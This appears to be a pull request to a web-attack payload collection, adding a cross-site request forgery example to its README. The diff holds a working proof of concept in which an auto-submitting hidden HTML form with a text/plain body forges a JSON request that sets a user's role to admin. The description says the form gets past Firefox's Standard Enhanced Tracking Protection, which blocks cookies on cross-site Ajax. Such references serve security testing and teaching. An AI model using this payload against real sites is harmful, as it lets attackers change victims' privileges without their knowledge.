### PR TITLE
Add JSON simple with form

### DIFF
--- a/CSRF Injection/README.md
+++ b/CSRF Injection/README.md
@@ -112,6 +112,8 @@ xhr.send();
 
 ### JSON POST - Simple Request
 
+With XHR :
+
 ```html
 <script>
 var xhr = new XMLHttpRequest();
@@ -125,6 +127,17 @@ xhr.send('{"role":admin}');
 </script>
 ```
 
+With autosubmit send form, which bypasses certain browser protections such as the Standard option of [Enhanced Tracking Protection](https://support.mozilla.org/en-US/kb/enhanced-tracking-protection-firefox-desktop?as=u&utm_source=inproduct#w_standard-enhanced-tracking-protection) in Firefox browser :
+
+```html
+<form id="CSRF_POC" action="www.example.com/api/setrole" enctype="text/plain" method="POST">
+// this input will send : {"role":admin,"other":"="}
+ <input type="hidden" name='{"role":admin, "other":"'  value='"}' />
+</form>
+<script>
+ document.getElementById("CSRF_POC").submit();
+</script>
+```
 
 ### JSON POST - Complex Request
 


### PR DESCRIPTION
Add JSON simple paylaod with autosubmit form. Using autosubmit form instead of AJax, allow to bypass some protection like the Standard Enhanced Tracking Protection in Firfefox, which will refuse to send cookie with  cross-site  Ajax request (tested with Firefox 115.0.2esr),.